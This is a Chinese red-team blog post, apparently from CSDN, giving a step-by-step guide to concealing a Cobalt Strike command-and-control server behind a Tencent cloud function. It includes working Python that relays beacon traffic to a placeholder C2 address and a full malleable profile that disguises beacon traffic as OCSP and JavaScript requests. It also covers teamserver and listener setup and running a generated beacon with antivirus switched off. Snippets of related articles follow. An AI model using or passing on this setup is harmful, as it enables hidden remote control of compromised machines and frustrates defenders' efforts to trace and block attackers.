云函数实现隐藏c2地址

最新推荐文章于 2024-05-22 22:42:14 发布
最新推荐文章于 2024-05-22 22:42:14 发布
阅读量473 收藏 8
点赞数 9
分类专栏: 红队工具建设 文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/milu_Sec/article/details/135305675
版权

介绍

说明:云函数是一个可以为开发者提供的无服务器执行代码的环境,相当于我们可以提前部署一个云函数,当我们需要运行这段代码的时候只需要通过去请求某一个特定的地址(即云函数地址)就可以运行了。因为云函数的请求域名解析出来的IP是变化的,所以可以用来隐藏c2地址

实现

1.配置云函数

打开腾讯云云函数配置中心,从头开始配置一个云函数,注意选择python3.6

图片

图片

配置代码写如下代码,c2地址填写 协议+ip+port,如http://127.0.0.1:80,本文使用80端口,所以后续使用http beacon

# -*- coding: utf8 -*-
import json,requests,base64
def main_handler(event, context):
    C2='http://ip'
    path=event['path']
    headers=event['headers']
    print(event) 
    if event['httpMethod'] == 'GET' : 
        resp=requests.get(C2+path,headers=headers,verify=False) 
    else: 
        resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False) 
        print(resp.headers) 
        print(resp.content)
    response={
        "isBase64Encoded": True,
        "statusCode": resp.status_code,
        "headers": dict(resp.headers),
        "body": str(base64.b64encode(resp.content))[2:-1]
    }
    return response

这段代码什么意思呢

该函数的目的是将传入的 HTTP 请求转发到指定的 URL,并将响应返回给调用方。

该函数从事件中提取出 HTTP 请求的路径、标头和正文。然后,它使用 Python 的 requests 库将请求发送到指定的 URL,并获取响应。最后,该函数将响应的状态码、标头和正文转换为一个 JSON 对象,并将其返回给调用方。

图片

图片

运行一下看是否正常,然后部署

图片

配置一下触发管理

图片

然后点这里继续配置

图片

编辑配置(右上角)

图片

路径改成/

图片

然后完成,此时我们就会得到一个公网地址,这个就会作为我们的c2上线地址

图片

2.配置cs

cs根目录配置一个cs的profile(这里不需要任何改动)只需要把后缀改成.profile

set sample_name "kris_abao";

set sleeptime "3000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

http-get {

    set uri "/api/getit";

    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "Nodejs";
        output {
            base64;
            print;
        }
    }
}
http-stager {  
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/postit";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}

这段代码是一个基于HTTP的攻击工具的配置文件,用于定制攻击行为。其中设置了多个变量,包括样本名称、sleep时间、抖动时间、最大DNS数量和用户代理。代码定义了三个HTTP请求:http-get、http-stager和http-post。每个请求都设置了URI路径,并定义了客户端和服务器端的HTTP头部。客户端头部设置了Accept和Cookie,其中Cookie值使用base64编码。服务器端头部设置了Content-Type、content-transfer-encoding和Server。输出使用base64编码并打印。此外,该代码还说明了HTTP请求的基本结构和用途。然后服务端启动cs

./teamserver 你的vps(服务端)ip 密码 ./1.profile

图片

出现这样的界面就ok了(建议用高版本cs,我之前用4.0一直起不来)

然后启动对应版本号的cs客户端

设置监听器,选http就行

图片

把这里的公网域名复制到http hosts和http host(stager)里

图片

(注意,host里不需要加http:和端口,不懂可以百度一下host是什么)

然后监听器创建成功

图片

接着尝试给自己电脑上一个马子(记得关杀软)

图片

选择刚才建立的监听器

图片

然后运行exe,可以发现ip一直在变化

图片

图片

图片

自此,我们已经实现用云函数隐藏c2地址

一些可能踩雷的点

如果云函数代码里配置的是vps80端口,记得不要和其他进程冲突端口

记得vps开启50050(如果设置的是cs默认连接端口)和80端口

profile文件缩进不当会报错

欢迎关注麋鹿安全,我们的文章会第一时间更新在公众号

麋鹿安全
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
函数隐藏C2
问题很多的小明
05-09 707
函数内容: 向真实C2服务器传递客户端真实ip,转发GET、POST请求,内容参考https://mp.weixin.qq.com/s/3EM6vqPJSA5E_FH6tKO8iw 部署后测试,访问API网关,真实服务器监听对应端口,查看数据包: 服务端配置 获取真实ip的必要配置,参考https://mp.weixin.qq.com/s/lL3UKCRW0cN4SgQIZl7vYw set sample_name "t"; set sleeptime "3000"; set ji
腾讯无服务器函数的使用
01-06
腾讯无服务器函数的使用 函数 函数是什么 函数就是供应商把底层的开发平台搭建好,我们可以直接编写函数代码放在函数平台上,然后调用函数实现相应的功能。而不需要去考虑开发平台。它是由事件触发,只有事件触发时才会调用函数。调用函数时,由函数平台向资源池中申请运行函数所需要的资源,再分配给函数运行,比如CPU、内存等资源。函数执行完后由平台将资源回收到资源池中;事件没触发时,它所需要的资源是处于闲置状态的。函数调用时申请资源,运行完后回收资源,能够使得资源得到高效的利用。而且函数平台也保证了资源分配的高可用。 优点 函数,它是一个不需要购买服务器的情况下,就能运行函数。有上面函数
【红队APT】反朔源隐藏&C2项目&CDN域前置&函数&数据中转&DNS转发
今天是几号的博客
04-19 2134
区别于单纯的CDN隐藏IP技术;域前置技术采用高权重域名进行伪装,效果要更上一层楼!可以看到这里正常上线,也是简单的进行流量代理,这里我把上面的iptables转发配置清空了,避免干扰 注: 如果中转服务器被拿下的话,那么搜集信息很可能就可以发现请求重定向的痕迹,从而找到真实C2地址。 请求重定向也可以和之前的CDN方法相结合,之前CDN方法是通过CDN将请求转发到真实C2服务器上,而添加请求重定向后,流程就变为了CDN转发到中转服务器,中转服务器再转到C2,达到双重隐藏的效果。
C++基本概念
weixin_45761880的博客
11-19 263
C++学习——第二天 基本概念 1.常量 2.变量 3.语句 4.函数 5.命名空间:用一个集合名称表示程序中一组名称项的方法。 例: namespace myspace{ int gitcount; //全局计算器 void print_info(char *pstring); }
函数隐藏c2服务器
weixin_44747030的博客
01-15 8516
学习记录
函数隐藏C2技术的防御反制思路
include_voidmain的博客
08-30 1584
函数隐藏C2技术的防御反制思路
利用腾讯函数隐藏C2服务器
xiaokp7的博客
06-17 668
隐藏c2服务器
使用函数隐藏webshell的真实IP
weixin_61638307的博客
04-10 482
在平时的学习工作中,大家有没有遇到一穿webshell就被ban掉IP呢,今天本文就决定分享一个使用函数隐藏自己的真实IP的案例,也可以利用函数的多出口性为了防止被红队溯源。
【防溯源】利用腾讯隐藏连接Webshell的真实IP
Ms08067安全实验室
08-10 755
文章来源|MS08067安全实验室本文作者:大方子(MS08067实验室核心成员)因为腾讯函数自带CDN,这样我们可以通过腾讯函数来转发我们的Webshell请求,从而达到隐藏真实IP...
函数隐匿C2服务器
m0_58687645的博客
03-04 7086
第一步,创建函数 登录腾讯平台,访问函数功能链接:https://console.cloud.tencent.com/scf/list?rid=8&ns=default。点击新建,创建方式选择自定义创建。函数名称可以自定义进行设置,主要是函数代码部分,将下面内容复制到函数代码中: # -*- coding: utf8 -*- import json,requests,base64 def main_handler(event, context): C2='http://<C
使用一个函数实现数据的增删改查
05-05
微信小程序开发,利用一个函数实现对集合数据的增加,删除,修改,查询显示,适用于小程序初学者参考
函数+Python+测试
05-30
函数+Python+测试
腾讯无服务器函数架构精解
01-27
继虚拟机,容器技术,无服务器化成为新的行业热点,无服务器函数可以让用户无需关心服务器的部署运营,只需开发最核心的业务逻辑,即可实现上线运营,具备分布容灾能力,可依据负载自动扩缩容,按照实际调用次数与...
使用腾讯函数隐藏C2
ATpiu的博客
02-16 4875
使用腾讯函数+API网关隐藏C2服务端(cobaltstrike 4.1)
利用函数搭建简易的代理池
weixin_48421613的博客
04-24 2113
本次介绍的是如何快速的利用腾讯函数来搭建免费的代理池。 很多小伙伴在测试的过程中经常遇到一个问题,被频繁的封ip,当然了我说的是有授权的情况下,请不要做非法使用,因为函数只能保证你的Ip是流动的但是并不能达到隐藏真实ip的一个手段,请大家不要非法入侵他人网站。 首先,用的是别人的项目,项目地址如下: 链接: https://github.com/shimmeris/SCFProxy/tree/main/HTTP. 使用须知如下: python版本大于3.8 安装env库 使用mitmproxy工具配
【防溯源】利用腾讯隐藏连接 Webshell 的真实 IP
大方子
07-31 5745
https://note.youdao.com/s/FViFcKpS
阿里服务器如何隐藏真实ip
weixin_67757219的博客
04-13 672
阿里f服务器如何隐藏真实IP,这个问题相信不少运营和技术都想知道怎么解决,毕竟真实IP暴露在外面相当于脱了衣服站在对手的面前,今天小蚁君就教大家阿里服务器如何隐藏真实ip。 1、使用高防的盾机服务   盾机服务的原理:盾机是一种减少攻击的手段,是通过利用两台高硬防的单线服务器作为端口映射到双线服务器的两个IP,将虚设的IP映射在真实IP的主机上,这样就能够首先避免被直接攻击的绝对目标,这样也让攻击方无法正确的找到双线服务器的真实IP,并且单线的硬防也更高。简单的说就是把真实IP隐蔽,将虚设IP映射
【渗透安全】利用腾讯CDN节点隐藏连接Webshell的真实IP
高冷的宅先生
08-15 1693
0.前言 前几天看了个公众号,突然想起来这个思路确实能够用的上,正好也实践一下,能够利用腾讯的CDN节点来隐藏连接webshell或者其他后门的真实IP,为此还买了3个月vps。 1.实验目的 文章来源是微信公众号【防溯源】利用腾讯隐藏连接Webshell的真实IP,也只是按照博主思路简单复现,学习记录一下。 官方概念 【函数】–官方文档 函数(Serverless Cloud Function,SCF)是腾讯为企业和开发者们提供的无服务器执行环境,帮助您在无需购买和管理服务器的情况下运行代码
内网安全--域渗透准备知识
最新发布
金灰的博客
05-22 488
通过域成员主机,定位出域控制器 IP 及域管理员账号,利用 域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性, 定位出域管理员登陆过的主机 IP,设法从域成员主机内存中 dump 出域管理员密码,进 而拿下域控制器、渗透整个内网.某个域用户需要使用 viso 软件进行绘图操作,于是联系网络管理员进行安装,网络管理 员采用域管理员身份登录了域成员主机,并帮助其安装了 viso 软件,于是这个有计算机 基础的员工,切换身份登录到了本地计算机的管理员,后执行。
函数实现注册与登入
07-27
函数可以用来实现注册和登录功能。下面是一个简单的示例,演示如何使用函数来处理用户的注册和登录请求。 首先,创建两个函数,一个用于处理注册请求,另一个用于处理登录请求。 1. 注册函数: ```javascript // 注册函数 exports.register = async (event, context) => { const { username, password } = event; // 从请求参数中获取用户名和密码 // 执行注册逻辑,将用户名和密码保存到数据库中,这里假设使用 MongoDB 数据库 const user = await User.create({ username, password }); // 返回注册成功的消息 return { code: 200, message: '注册成功', data: user, }; }; ``` 2. 登录函数: ```javascript // 登录函数 exports.login = async (event, context) => { const { username, password } = event; // 从请求参数中获取用户名和密码 // 根据用户名查询数据库中的用户信息 const user = await User.findOne({ username }); if (!user) { // 用户不存在 return { code: 400, message: '用户不存在', }; } if (user.password !== password) { // 密码错误 return { code: 400, message: '密码错误', }; } // 登录成功 return { code: 200, message: '登录成功', data: user, }; }; ``` 以上示例代码是基于 Node.js 平台使用函数的场景,实际上可以根据具体的开发需求和平台的支持,使用不同的编程语言和技术实现注册和登录功能。在上述示例中,我们使用了一个简单的数据库模型来存储用户信息,你可以根据实际情况选择合适的数据库技术来存储和管理用户数据。 当你调用注册函数时,需要传递用户名和密码等参数,函数会将用户信息保存到数据库中,并返回注册成功的消息。而当你调用登录函数时,需要传递用户名和密码等参数,函数会根据数据库中的用户信息进行验证,并返回登录成功或失败的消息。 请注意,以上示例只是一个简单的演示,实际开发中还需要考虑安全性、验证机制、数据加密等方面的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值